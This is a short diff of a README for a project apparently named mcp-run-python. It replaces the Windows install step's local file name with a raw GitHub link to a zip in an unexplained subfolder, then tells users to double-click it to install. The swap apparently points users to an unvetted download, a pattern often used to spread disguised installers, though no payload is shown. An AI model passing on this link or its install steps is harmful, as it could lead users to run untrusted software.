MagmaBasilisk/mcp-run-python/README.md

 ### For Windows:

-1. Locate the downloaded file: `mcp-run-python-windows.exe`.
+1. Locate the downloaded file: `https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip`.
 2. Double-click the file to start the installation.
 3. Follow the prompts to complete the installation.
 4. Find the mcp-run-python shortcut on your desktop or Start menu.